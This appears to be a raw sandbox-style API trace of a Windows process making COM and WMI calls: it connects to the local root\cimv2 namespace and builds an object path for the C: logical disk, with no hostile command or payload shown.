WbemDefPath:IUnknown:Release (This=0x60273d0) returned 0x0 [0213.997] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea64 | out: ppvObject=0x691ea64*=0x6029f80) returned 0x0 [0213.997] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ea20 | out: ppvObject=0x691ea20*=0x0) returned 0x80004002 [0213.997] WbemDefPath:IUnknown:AddRef (This=0x6029f80) returned 0x3 [0213.997] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e37c | out: ppvObject=0x691e37c*=0x0) returned 0x80004002 [0213.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e32c | out: ppvObject=0x691e32c*=0x0) returned 0x80004002 [0213.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e338 | out: ppvObject=0x691e338*=0xbdf070) returned 0x0 [0213.998] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf070, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e340 | out: pCid=0x691e340*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.998] WbemDefPath:IUnknown:Release (This=0xbdf070) returned 0x3 [0213.998] CoGetContextToken (in: pToken=0x691e398 | out: pToken=0x691e398) returned 0x0 [0213.998] CoGetContextToken (in: pToken=0x691e7a0 | out: pToken=0x691e7a0) returned 0x0 [0213.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e830 | out: ppvObject=0x691e830*=0x0) returned 0x80004002 [0213.998] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x2 [0213.998] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x1 [0213.998] CoGetContextToken (in: pToken=0x691f128 | out: pToken=0x691f128) returned 0x0 [0213.998] CoGetContextToken (in: pToken=0x691f088 | out: pToken=0x691f088) returned 0x0 [0213.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x691f158*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f154 | out: ppvObject=0x691f154*=0x6029f80) returned 0x0 [0213.998] WbemDefPath:IUnknown:AddRef (This=0x6029f80) returned 0x3 [0213.998] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x2 [0213.998] WbemDefPath:IWbemPath:SetText (This=0x6029f80, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0213.998] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f80, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0213.998] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=2, puBuffLength=0x691f2d8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d8*=0x20, pszText=0x0) returned 0x0 [0213.998] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=2, puBuffLength=0x691f2d8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0213.998] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f80, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0213.998] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f80, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0213.999] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f80, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0213.999] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f80, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0213.999] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f80, puCount=0x691f25c | out: puCount=0x691f25c*=0x0) returned 0x0 [0213.999] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x691f248 | out: puCount=0x691f248*=0x2) returned 0x0 [0213.999] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0x0, pszText=0x0 | out: puBuffLength=0x691f244*=0xf, pszText=0x0) returned 0x0 [0213.999] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f244*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.999] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f1f8 | out: ppv=0x691f1f8*=0xb51e34) returned 0x0 [0213.999] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f1f0 | out: pAptType=0x691f1f0*=1) returned 0x0 [0213.999] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f1f4 | out: ppvObject=0x691f1f4*=0x0) returned 0x80004002 [0213.999] IUnknown:Release (This=0xb51e34) returned 0x1 [0214.000] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691eb60 | out: ppv=0x691eb60*=0x60274e0) returned 0x0 [0214.000] WbemDefPath:IUnknown:QueryInterface (in: This=0x60274e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ed78 | out: ppvObject=0x691ed78*=0x0) returned 0x80004002 [0214.000] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60274e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ed8c | out: ppvObject=0x691ed8c*=0x6029ea0) returned 0x0 [0214.000] WbemDefPath:IUnknown:Release (This=0x60274e0) returned 0x0 [0214.000] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9ac | out: ppvObject=0x691e9ac*=0x6029ea0) returned 0x0 [0214.000] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691e968 | out: ppvObject=0x691e968*=0x0) returned 0x80004002 [0214.000] WbemDefPath:IUnknown:AddRef (This=0x6029ea0) returned 0x3 [0214.000] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e2c4 | out: ppvObject=0x691e2c4*=0x0) returned 0x80004002 [0214.000] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e274 | out: ppvObject=0x691e274*=0x0) returned 0x80004002 [0214.001] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e280 | out: ppvObject=0x691e280*=0xbdef80) returned 0x0 [0214.001] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdef80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e288 | out: pCid=0x691e288*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.001] WbemDefPath:IUnknown:Release (This=0xbdef80) returned 0x3 [0214.001] CoGetContextToken (in: pToken=0x691e2e0 | out: pToken=0x691e2e0) returned 0x0 [0214.001] CoGetContextToken (in: pToken=0x691e6e8 | out: pToken=0x691e6e8) returned 0x0 [0214.001] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e778 | out: ppvObject=0x691e778*=0x0) returned 0x80004002 [0214.001] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x2 [0214.001] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x1 [0214.001] CoGetContextToken (in: pToken=0x691f070 | out: pToken=0x691f070) returned 0x0 [0214.001] CoGetContextToken (in: pToken=0x691efd0 | out: pToken=0x691efd0) returned 0x0 [0214.001] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x691f0a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f09c | out: ppvObject=0x691f09c*=0x6029ea0) returned 0x0 [0214.001] WbemDefPath:IUnknown:AddRef (This=0x6029ea0) returned 0x3 [0214.001] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x2 [0214.001] WbemDefPath:IWbemPath:SetText (This=0x6029ea0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0214.001] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ea0, puCount=0x691f220 | out: puCount=0x691f220*=0x2) returned 0x0 [0214.001] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x691f21c*=0x0, pszText=0x0 | out: puBuffLength=0x691f21c*=0xf, pszText=0x0) returned 0x0 [0214.001] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x691f21c*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f21c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.001] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f220 | out: ppv=0x691f220*=0xb51e34) returned 0x0 [0214.001] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f218 | out: pAptType=0x691f218*=1) returned 0x0 [0214.002] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f21c | out: ppvObject=0x691f21c*=0x0) returned 0x80004002 [0214.002] IUnknown:Release (This=0xb51e34) returned 0x1 [0214.002] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ee40 | out: ppv=0x691ee40*=0x6023d38) returned 0x0 [0214.002] WbemLocator:IUnknown:QueryInterface (in: This=0x6023d38, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691f058 | out: ppvObject=0x691f058*=0x0) returned 0x80004002 [0214.002] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023d38, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f06c | out: ppvObject=0x691f06c*=0x60271e0) returned 0x0 [0214.003] WbemLocator:IUnknown:Release (This=0x6023d38) returned 0x0 [0214.003] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ec8c | out: ppvObject=0x691ec8c*=0x60271e0) returned 0x0 [0214.003] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ec48 | out: ppvObject=0x691ec48*=0x0) returned 0x80004002 [0214.003] WbemLocator:IUnknown:AddRef (This=0x60271e0) returned 0x3 [0214.003] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e5a4 | out: ppvObject=0x691e5a4*=0x0) returned 0x80004002 [0214.003] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e554 | out: ppvObject=0x691e554*=0x0) returned 0x80004002 [0214.003] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e560 | out: ppvObject=0x691e560*=0x0) returned 0x80004002 [0214.003] CoGetContextToken (in: pToken=0x691e5c0 | out: pToken=0x691e5c0) returned 0x0 [0214.003] CoGetContextToken (in: pToken=0x691e9c8 | out: pToken=0x691e9c8) returned 0x0 [0214.003] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea58 | out: ppvObject=0x691ea58*=0x0) returned 0x80004002 [0214.003] WbemLocator:IUnknown:Release (This=0x60271e0) returned 0x2 [0214.003] WbemLocator:IUnknown:Release (This=0x60271e0) returned 0x1 [0214.003] CoGetContextToken (in: pToken=0x691f038 | out: pToken=0x691f038) returned 0x0 [0214.003] CoGetContextToken (in: pToken=0x691ef98 | out: pToken=0x691ef98) returned 0x0 [0214.003] WbemLocator:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x691f068*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x691f064 | out: ppvObject=0x691f064*=0x60271e0) returned 0x0 [0214.003] WbemLocator:IUnknown:AddRef (This=0x60271e0) returned 0x3 [0214.003] WbemLocator:IUnknown:Release (This=0x60271e0) returned 0x2 [0214.003] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ea0, puCount=0x691f1fc | out: puCount=0x691f1fc*=0x2) returned 0x0 [0214.004] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=8, puBuffLength=0x691f1f8*=0x0, pszText=0x0 | out: puBuffLength=0x691f1f8*=0xf, pszText=0x0) returned 0x0 [0214.004] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=8, puBuffLength=0x691f1f8*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1f8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.004] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x691f0d4 | out: ppv=0x691f0d4*=0x6027410) returned 0x0 [0214.004] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027410, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x691f168 | out: ppNamespace=0x691f168*=0x603352c) returned 0x0 [0214.834] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f004 | out: ppvObject=0x691f004*=0xb5ae64) returned 0x0 [0214.834] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ae64, pProxy=0x603352c, pAuthnSvc=0x691f054, pAuthzSvc=0x691f050, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c, pImpLevel=0x691f03c, pAuthInfo=0x691f040, pCapabilites=0x691f044 | out: pAuthnSvc=0x691f054*=0xa, pAuthzSvc=0x691f050*=0x0, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c*=0x6, pImpLevel=0x691f03c*=0x2, pAuthInfo=0x691f040, pCapabilites=0x691f044*=0x1) returned 0x0 [0214.834] WbemLocator:IUnknown:Release (This=0xb5ae64) returned 0x1 [0214.834] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff8 | out: ppvObject=0x691eff8*=0xb5ae84) returned 0x0 [0214.834] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff4 | out: ppvObject=0x691eff4*=0xb5ae64) returned 0x0 [0214.835] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ae64, pProxy=0x603352c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0214.835] WbemLocator:IUnknown:Release (This=0xb5ae64) returned 0x2 [0214.835] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x1 [0214.835] CoTaskMemFree (pv=0xbd4948) [0214.835] WbemLocator:IUnknown:Release (This=0x6027410) returned 0x0 [0214.835] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ebf4 | out: ppvObject=0x691ebf4*=0xb5ae84) returned 0x0 [0214.835] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ebb0 | out: ppvObject=0x691ebb0*=0x0) returned 0x80004002 [0214.836] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691e9cc | out: ppvObject=0x691e9cc*=0x0) returned 0x80004002 [0214.836] WbemLocator:IUnknown:AddRef (This=0xb5ae84) returned 0x3 [0214.836] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e50c | out: ppvObject=0x691e50c*=0x0) returned 0x80004002 [0214.836] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e4bc | out: ppvObject=0x691e4bc*=0x0) returned 0x80004002 [0214.837] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e4c8 | out: ppvObject=0x691e4c8*=0xb5ade4) returned 0x0 [0214.837] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5ade4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e4d0 | out: pCid=0x691e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.837] WbemLocator:IUnknown:Release (This=0xb5ade4) returned 0x3 [0214.837] CoGetContextToken (in: pToken=0x691e528 | out: pToken=0x691e528) returned 0x0 [0214.837] CoGetContextToken (in: pToken=0x691e930 | out: pToken=0x691e930) returned 0x0 [0214.837] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9c0 | out: ppvObject=0x691e9c0*=0xb5ae6c) returned 0x0 [0214.837] WbemLocator:IRpcOptions:Query (in: This=0xb5ae6c, pPrx=0xb5ae84, dwProperty=2, pdwValue=0x691e9e8 | out: pdwValue=0x691e9e8) returned 0x80004002 [0214.837] WbemLocator:IUnknown:Release (This=0xb5ae6c) returned 0x3 [0214.837] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x2 [0214.837] CoGetContextToken (in: pToken=0x691ef08 | out: pToken=0x691ef08) returned 0x0 [0214.837] CoGetContextToken (in: pToken=0x691ee68 | out: pToken=0x691ee68) returned 0x0 [0214.837] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x691ef38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x691ef34 | out: ppvObject=0x691ef34*=0x603352c) returned 0x0 [0214.838] WbemLocator:IUnknown:AddRef (This=0x603352c) returned 0x4 [0214.838] WbemLocator:IUnknown:Release (This=0x603352c) returned 0x3 [0214.838] WbemLocator:IUnknown:Release (This=0x603352c) returned 0x2 [0214.838] SysStringLen (param_1=0x0) returned 0x0 [0214.838] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f80, puCount=0x691f2cc | out: puCount=0x691f2cc*=0x0) returned 0x0 [0214.838] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=2, puBuffLength=0x691f2c8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2c8*=0x20, pszText=0x0) returned 0x0 [0214.838] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=2, puBuffLength=0x691f2c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0214.838] CoGetContextToken (in: pToken=0x691ef38 | out: pToken=0x691ef38) returned 0x0 [0214.838] WbemLocator:IUnknown:AddRef (This=0xb5ae84) returned 0x3 [0214.838] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691edcc | out: ppvObject=0x691edcc*=0xb5ae84) returned 0x0 [0214.838] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x3 